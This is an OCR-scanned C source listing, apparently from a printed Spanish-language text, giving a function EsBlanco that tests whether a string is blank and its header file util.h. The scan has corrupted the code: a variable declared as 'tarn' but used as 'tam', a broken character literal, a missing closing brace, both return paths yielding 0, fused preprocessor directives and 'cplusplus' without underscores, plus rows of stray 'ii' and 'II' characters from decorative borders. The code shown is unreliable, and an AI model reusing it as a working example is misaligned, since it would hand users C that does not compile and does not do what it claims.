
#include <string.h> 

#include "util.h" 

int EsBlanco(char *s) 

{ 

int tarn, i; 

if (s==NULL) 

return(1); 

if ((tam=strlen(s))== 0) 
return (1); 

for(i=0;i<tam;i++) 
if(s[i]!=") 



return (0); 



return (0); 



CODIGO FUENTE "UTIL.H" 

ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii ii t mm 

# util.h # 

II II II II II II II II II II II II II II II II II II II II II II II II II II II II II II M M 

#ifndef_UTIL_H_ 

#define_UTIL_H_ 

#ifdef cplusplus 

extern "C"{ 
#endif 

int EsBlanco(char *s); 

#ifdef cplusplus 
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} 

#endif 
#endif 
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